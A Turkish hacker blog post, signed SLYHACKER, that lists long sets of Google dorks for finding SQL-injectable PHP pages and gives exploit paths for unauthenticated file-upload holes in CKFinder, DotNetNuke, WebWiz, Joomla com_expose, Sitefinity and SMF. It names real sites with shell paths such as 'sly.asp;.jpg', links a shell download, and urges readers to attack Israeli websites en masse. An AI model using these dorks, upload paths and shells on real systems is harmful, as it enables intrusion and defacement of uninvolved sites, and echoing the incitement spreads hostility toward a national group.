Mesajlar Etiketlendi ‘güncel açıklar’

Merhabalar sql ile uğraşanlar için güncel exploit bulmak bayağı karışık bi iştir.Ben size yine güncel birkaç exploit vereceğim her zaman en iyi paylaşımlarla sizlerle olmak dileğiyle selametle.. SLYHACKER

 

inurl:”default.php?modules=”
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=

PHPnuke MT 8.3.5 ckfinder Shell Upload

Google : inurl:”PHP-Nuke Project By PHPNuke.ir”

Eklenecek kod:

http://siteadresi.com/includes/ckfinder/ckfinder.html

Yüklendiği yer : /includes/ckfinder/files/dosyaniz.jpg

Evet kardeşlerim sizlere basit fakat hala güncel olan bir açığı paylaşmak istedim ve türkçe bir kaynak şuan bu konuyla ilgili olmadığı için paylaşmak istedim.
Ben size ufak bir denemeden sonra nasıl kullanacağınız konusunda sizi bilgilendireceğim.

Aramalarımızı ekleyeceğimiz kod üzerinden gideceğiz.Bir kaç tane ben size yazayım kalanını kendiniz geliştirebilirsiniz.

inurl:”/includes/ckfinder/ckfinder.html “

inurl:”/includes/ckfinder/”

inurl:”/admin/includes/ckfinder/”

inurl:”/ckfinder/ckfinder.html”

örnek bir site : http://www.naturalchildbirthproject.com/admin/includes/ckfinder/ckfinder.html

dosya atılmış hali: http://www.naturalchildbirthproject.com/userfiles/files/logo.jpg

Herkese kolay gelsin selamlar..

SLYHACKER

Yeni açık paylaşımı (Priv Paylaşım İsrail web sitelerine yönelik)

Merhaba arkadaşlar uzun süredir paylaşım yapmadım bu açıgı ilk defa paylaşıyorum bi aralar 1300 israil sitesini hacklemiştim işte o olayin acıgını paylasıyorum hedefimiz İSRAİL herkes saldırsın mahvetsin israili.. Herkese basarılar iyi bayramlar..

Benden bir bayram hediyesi.. Esen kalın iyi günler..

Arama kodumuz : inurl:”page.asp?kat=”
Site sonuna asagidakı kodları deniyoruz ve bi upload ekranı gelıyor shelimizi oradan yüklüyoruz
/admin/editMorganaPage.asp
/editorText.asp
/admin/editMorganPicture.asp
/admin13/editMorganPicture.asp
/admin12/editMorganPicture.asp

Test edilen ornek site : http://www.big-power.info/admin/editMorganPicture.asp
Shell yolu : http://www.big-power.info/images_morgana/sly.asp;.jpg

Dosyayi ve shelli indirmek için aşagıdaki linki kullanabilirsiniz.

http://www.dosya.tc/server23/m2cADT/Slyhacker.rar.html
————————————————–
Copyright 2006 Turkhacker Müslüman SLYHACKER

EN GÜNCEL AÇIKLAR

inurl:”/admin/saveannounce_upload.asp”

inurl:”admin/eWebEditor/Upload.asp”

inurl:”UploadFile/upload.asp”

Dotnuke uplaod açıgı ;

inurl:/tabid/36/language/en-US/Default.aspx

Upload Sayfasi
Için; /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Upload Kod : javascript:__doPostBack(’ctlUR L$cmdUpload’,’’ ) bu kod tarayıcınızın adres bolumune adres cubuguna yanı yazıp enterlayınca upload ekrani gelir.
Mesela
inurl:tabid/1162/Default.aspx degişik şekillerde kod geliştirilebilir.

WEBWİZ ACİGİ (RTE UPLOAD ACIGI )

inurl:rte/my_documents/my_files/
inurl:/my_documents/my_files/
exloit: /rte/RTE_popup_file_atch.asp

Editör açıgı

inurl:editor/assetmanager/ (arama kodu geliştirilebilir)

EXPLOİT : /Editor/assetmanager/assetmanager.asp

Joomla upload açıgı

inurl index.php?option=com_expose

Exploit: administrator/components/com_expose/uploadimg.php
Uploadin gittigi yer : /components/com_expose/expose/img/

Sitefinity: Login upload açıgı

inurl:”Sitefinity: Login”
exploit: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx

SMF 1.1.11 açıgı

inurl:SMF 1.1.11
Exploit : http://siteadi.com/index.php?action=reminder;sa=setpassword;u=1;code=0eb3d1f811

örnek site :

http://modxcms.com/forums/index.php?action=reminder;sa=setpassword;u=1;code=0eb3d1f811

Kolay gelsin selametle.. SLYHACKER

Selam kardeşlerim herşey gayet net ve basit şekilde anlatılmıştır aşağıdaki linkden indirebilrsiniz
Kendi anlatımımdır kolay gelsin..

Burdan indirebilirsiniz

şifre : slyhacker